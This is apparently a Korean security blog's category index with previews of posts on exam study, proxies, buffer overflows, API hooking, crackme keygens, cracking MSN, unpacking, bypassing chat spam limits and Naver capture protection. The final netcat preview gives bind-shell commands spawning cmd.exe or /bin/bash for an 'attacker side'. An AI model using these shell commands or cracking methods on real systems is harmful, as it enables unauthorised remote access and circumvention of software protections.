보안 썸네일형 리스트형 정보 처리 기사 아~ 요즘에 정보 처리 기사 시험 준비에 한창이다.. 이 나이에.. 흑.. 기사 시험 땜시 이렇게 해야 되나 싶기도 하면서도 어떻게 보믄 국가직으로 갈 수 있는 기회가 올 때 기회를 잡기위해 해놔야지.. 라는 생각이다.. 벌써 3일째 공부중이다... 이번주 일요일이 시험인데 말이다.. 이제 데이터 베이스 끝내고 이진수 공부중이다 ㅋㅋ 아.. 정말 수학을 열심히 공부 해 놨어야 해.. 왜이렇게 헛갈리는거야~ ㅠ_ㅠ 이번에 떨어지면 울어 버릴꺼야 ㅋㅋ 얼마전 좋은 기회가 있었다. 좋게 말하면 점핑이겠지? 기회를 잡지 못한 나.. 땅을 치고 통곡 할 일이다. 하지만 비로소 이번을 계기로 절실히 깨닫은게 있다면 그건 바로.. " 준비된 자만이 기회를 잡는다.. " 정말.. 흔하디 흔한 이 한마디지만, 이러한 상.. 더보기 보안 관리 종종 내가 하고 있는 보안 관리 라는 측면에 대한 비전에 대해 생각해 보고는 한다. 아무런 체계도 없는 회사에 입사해 어느덧 1년 7개월째 보안 관리에 대한 일을 하고 있다. 항상 언제나 어디서든 똑같은 생각이다. 이 회사의 보안 구멍은 어디일까, 어떻게 하면 막을 수 있을까, 어떻게 하면 정책을 사용자들이 따를 수 있을 것이며, 어떻게 해야 보안이라는 편의성과는 상반되는 개념이지만 사용자들에게 친숙히 다가갈수 있는 정책을 내 놓을 수 있을까, 어떻게 해야 직원들이 보안에 대한 딱딱한 인식을 접을 수 있을까, 강제적으로 해야 하나 친근하게 다가가야 하나, 어떻게 해야 보안에 대한 이해를 쉽게 할 수 있을까, 어떻게 해야 좀 더 쉽게, 편하게, 하지만 강력하게 다가갈 수 있을까라는 생각을 하게 된다. 결국.. 더보기 윈도우로 할 수 있는 해킹들 윈도우로 할 수 있는 해킹들 이 강좌에서는 하이텔 같은 가장 취약한 온라인 서비스에서 윈도우95 운영체제로도 아주 심각한 인터넷 해커들만이 할 수 있는 몇 가지 해킹법을 가르쳐 주겠다. 한 번 해 보라. 바 로 오늘! 이 강좌의 내용은 다음과 같다. ▶윈도우 95의 잘 알려지지 않은 도스 명령어를 사용하여, 유명한 온라인 서비스 제공업 체에서 사용하는 컴퓨터를 추적하고, 포트 서핑하기 ▶아주 유용한 해킹 툴인 whois, nslookup, 그리고 dig 등을 사용할 수 있는 컴퓨터로 텔넷해 들어가기 ▶윈도우에서 사용할 수 있는 포트 스캐너나 패스워드 크래커같은 해커 툴을 다운로드 받기 ▶인터넷 익스플로러를 사용하면서, 학교나 직장 컴퓨터에서 사용할 수 없도록 막혀 있는 프로그램을 사용하기 그래 좋다. 벌.. 더보기 프락시의 기능 proxy의 3가지 유형 1. Transparent 이 종류의 프록시는 웹 요청 시도시 서비스요청 헤더 부분에 client의 IP를 함께 포함합니다. 이 때문에 서버에서는 서비스요청을 시도하는 클라이언트가 보내는 패킷의 헤더를 검사하면, 충분히 client의 IP를 추적할 수 있습니다. 헤더 포함 내용: 프록시 서버 종류, client 실제 IP 분석된 헤더를 살펴보면, "Via:" 부분이 바로 프록시 서버의 종류를 뜻하는 것이고, "X-Forwarded-For:" 부분 다음 부터가 client의 실제 IP를 뜻합니다. 이와 같이 Transparent type proxy는 추적하기가 쉽다는 장점이 있습니다. 참고로, 기존에 존재하고 있는 대부분의 프록시 추적 프로그램이 바로 이 Transparent 역추.. 더보기 보안 툴 보호되어 있는 글입니다. 더보기 버퍼 오버 플로워 잘 만들어진 버퍼오버플로우 문서 1. 오버플로우란? 2. 이것을 알아야....기초정보 3. 이것도 알아야....중급정보 4. 이것까지?........고급정보 5. 예를들면?........실전연습 6. 언더플로우?......포멧스트링 7. 감사의 말 8. 참고자료 -------------------------------------------------------------------------------- 1. 오버플로우란? 자 먼저 오버플로우가 뭔지 부터 알아보고 넘어가도록 하겠습니다. 오버플로우란 뭔가를 담는 그릇이 있을때 그 그릇의 용량을 초과해서 무엇을 담을려고 하면 흘러넘치는 현상이 발생합니다. 여러분이 식탁위에 컵을 놓고 거기에 물을 넣는다면 물이 얼마나 들어가는지 눈으로 보면서 물을 따릅니다... 더보기 API HOOK 유저 레벨에서 API Hook (windows,2000, 2003, Vista) 이 문서에는 유저 레벨 즉, Ring 3권한에서 API Hook를 하는 방법에 대해서 설명합니다. ( Ring 0권한에서 API Hook를 하는 방법에 대해서는 다음 문서에서 설명하겠습니다. 혹시나 CPU에서 제공하는 Ring에 대해서 모르신다면 관련 문서를 먼저 읽어보기를 권합니다. ) API Hook과 관련하여 인터넷에서 자료들이 많이 있는 것이 사실이지만 설명이 너무 어렵거나 관련 소스가 있어도 너무 불안정하게 돌아가는 경우가 많습니다. 따라서 간단한 API Hook를 구현해보고 실제로 사용할 수 있는 Hook 코드에 대해서 설명하려고 합니다. API Hook이란, Win32 애플리케이션에서 사용하는 API를 내가 만든.. 더보기 키잰 만들기 키젠 만들기!! 이번에는 저번 문서 보다는 조금 어려우면서도 쉬운 크랙미 프로그램을 크랙해보겠습니다. 우선 크랙미 프로그램을 받습니다. haque-abex5.7z 파일을 받으시고 압축을 푸신 후에 abexcm5.exe 라는 파일을 실행해보세요. 절대로 abexcm5.exe 외에 파일들은 건드리시면 안됩니다. 왜냐면 그 외에 파일들은 해당 프로그램의 크랙과 관련 된 정답이기 때문입니다. 즉, 정답을 미리 보고 하시면 안되겠죠. 프로그램을 실행하면 다음 그림과 같이 뜹니다. 이 상태에서 체크 버튼을 누르시면 시리얼 번호가 틀리다고 나옵니다. 우리는 이 시리얼 번호를 알아내는 것 입니다. 가장 중요한 것은 이전 크랙과는 다르게 프로그램을 패치하시면 안됩니다. 이전 크랙미에서는 프로그램의 기계어 코드를 디스어셈.. 더보기 크랙하기 우선 리버스 엔지니어링이란 무엇이고 크랙이란 무엇인지 제가 생각하는대로 쓰겠습니다. 리버스 엔지니어링은 이미 만들어진 컴파일 된 실행 파일을 보고 그 프로그램이 내부적으로 어떻게 동작하는지 알아내는 것 입니다. (물론 그 프로그램은 소스가 공개되어 있지 않겠죠.소스가 공개되어 있다면 리버싱을 할 필요가 없으니까요.) 크랙이란 위에 리버스 엔지니어링으로 알아낸 결과를 통해서 실행 파일에 일부분에 코드를 자신이 원하는 코드로 변경하는 것을 말합니다. 리버스 엔지니어링과 크랙을 하기 위해서는 도구와 지식이 필요합니다. 우선 필요한 도구는 HEX 에디터, 소프트아이스, 올리 디버거 같은 것들이 있습니다. 이 문서에서는 크랙 할 때 사용 할 도구로 올리 디버거를 사용 할 껍니다. 왜냐면 이게 제일 쉽고 무료이기 .. 더보기 크랙 어려운거 키젠 만들기 두번재 (어려운거) 요번에 크랙하려는 프로그램은 이전 문서와 별로 다른 부분이 없습니다. 단지, 키젠을 생성하는 루틴이 조금 어려울 뿐 입니다. Make_KeyGen_Cracked.7z 이전 문서까지는 이 문서를 보시는 분들이 정말로 처음 접한다고 생각하면서 설명을 하였지만 지금까지 올리 디버거에 기초적인 인터페이스와 크랙 방법에 대해서 어느정도 설명이 되었다고 생각하여 중요한 부분에 대해서만 적을까합니다. ( 물론 설명이 되지 않는 부분이 있다면 이전과 같은 방식으로 매우 자세하게 설명할 생각입니다. ) 위에 파일을 풀어보시면 키젠도 같이 만들어져 있으며 Delphi7로 컴파일되어 있습니다. 밑에 코드는 키젠을 만들기 위해 분석해야 할 Exe파일의 디스어셈블링 된 코드이며 관련 된 부분은 .. 더보기 중복 실행 방지 중복실행 방지 지금 이 문서에서 크랙하는 MSN 7.5 버전은 영문 버전을 대상으로 합니다. MSN 크랙은 생각보다 상당히 쉽습니다. 일반적으로 상용 프로그램같은 경우 디버깅을 힘들게 하기 위해서 실행파일 헤더에 변경을 가하고 압축을 한다던가 안티 디버깅 코드를 삽입한다거나 하는데 이런것이 전혀없기 때문입니다. 단지 프로그램에 용량이 커서 디스 어셈블리 된 코드가 너무 양이 많아 복잡해보이는 점 빼고 말입니다. 참고로 크랙시 원본파일은 백업하실 필요 없습니다. 어차피 코드 수정 후 다른 이름으로 저장 할 것 이기 때문에.. 우선적으로 크랙하기전에 다음과 같은 상황을 숙지하셔야 합니다. 이전 문서에서 푼 크랙미보다 코드가 상당히 길고 복잡합니다. 일일이 한 줄씩 코드를 해석하시면 안됩니다. 대충 코드를 읽.. 더보기 실행 파일 팩킹 실행파일 팩킹 이 문서에서는 실행파일 팩킹에 관해서 설명합니다. 우선 크랙미 프로그램을 다운받습니다. cffo-2.7z 압축을 푸시면 파일이 여러개가 있는데 CrackMe2.exe 라는 실행파일이 우리가 크랙해야 할 크랙미입니다. ( 다른 파일들은 크랙이 이미 된 겁니다. ) 우선 실행해보시면 다음과 같은 창이 뜹니다. 지금까지 크랙해왔던 크랙미보다 디자인이 훨씬 더 멋있어졌음을 알 수 있습니다. ( 델파이로 만들었네요. ) 이제 우리는 이 크랙미 프로그램의 시리얼 키를 알아내기 위해서 이전과 같이 올리디버거로 열어봅니다. 올리 디버거로 열어보면 이상한 창이 하나 뜨게 됩니다. 이러한 메세지가 뜨는 이유는 열려는 실행파일이 팩킹이 되어 있기 때문입니다. 즉, 실행파일 자체가 압축이 되어 있다는 것 입니다.. 더보기 버디버디 도배 금지 풀기 이번 강좌에서는 도배를 하는법에 대해서 다루겠는데요 대부분의 Game들과 Chatting들은 원활한 환경을 제공하기 위해서 도배를 할수 없도록 해놓지요. 오늘의 예제로 쓸 버디채팅 역시 마찬가지입니다. 버디 채팅에서 도배를 하면 어떤 메시지 박스가 뜨는것이 아니라, 곳바로 방에서 나가져 버리기 때문에, 어떤 String Reference를 추적하는건 불가능하다고 생각될지도 모릅니다. ;) 어떤 방법을 쓸지 잘 감이 안올지도 모르죠 ;) 외국에서도 Online Game을 우리나라 만큼 많이 하지 않아서인지 ;) Online Game의 도배하는법에 대해서는 다루는 강좌를 찾기가 힘들더군요 ;) (아니, 아에 찾지 못했습니다 T.T) 뭐, 오랜만에 방학을 맞아서 푹 자다보니깐 글쓸 마음도 생기고 해서, 글을 .. 더보기 네이버 만화 캡춰 방지 네이버 만화 캡쳐 방지 분석 이 문서에는 네이버 만화를 볼 때 화면 캡쳐 프로그램이 동작을 하지 않게 되는데 어떠한 방식으로 구현이 되었는지에 대해 간단하게 리버싱하는 방법에 대해 적을까합니다. ( 지금까지는 CrackMe를 크랙해왔지만 실제로 리버싱하는 경우는 이번이 처음이라고 할 수 있겠습니다. ) 갑자기 화면 캡쳐 방지에 대해서 리버싱을 하려고 하면 상당히 어렵다고 생각 할 수 있지만 네이버쪽에서 사용하는 방지방법은 간단한 방법이므로 이에 대해 설명할까 합니다. ( 불법적인 문제가 있는것에 한해서 뚫는 방법에 대해서 직접적으로 언급하지는 않을 것 입니다. ) 그러면 실제로 어떤식으로 막히는지 확인하기 위해 사이트에 접속하여 무료 맛보기를 클릭합니다. ( 죄송하지만 제가 돈이 없어서 유료로 열 수가 .. 더보기 NC 사용법 Network Attack NC ! NC로 연결후 채팅하기 사용하기 ! 서버 설정 # nc -l -p 3000 c:\> nc -lvp 3000 ! 클라이언트 설정 # nc 3000 ! 연결한 후 Message를 입력하면 연결된 두 사용자간 Message가 전달된다. ============================================== Linux에서 --> Windows로 접속 Windows용 NC를 받아 C:\ 압출 풀어 놓는다.. c:\> nc -l -p 30000 -e cmd.exe ! 공격자 측에서... nc 30000 Windows에서 --> Linux로 접속 ! Linux에서 설정 # nc -l -p 30000 -e /bin/bash ! Windows에서 설정 C:\>nc 3000.. 더보기 이전 1 다음
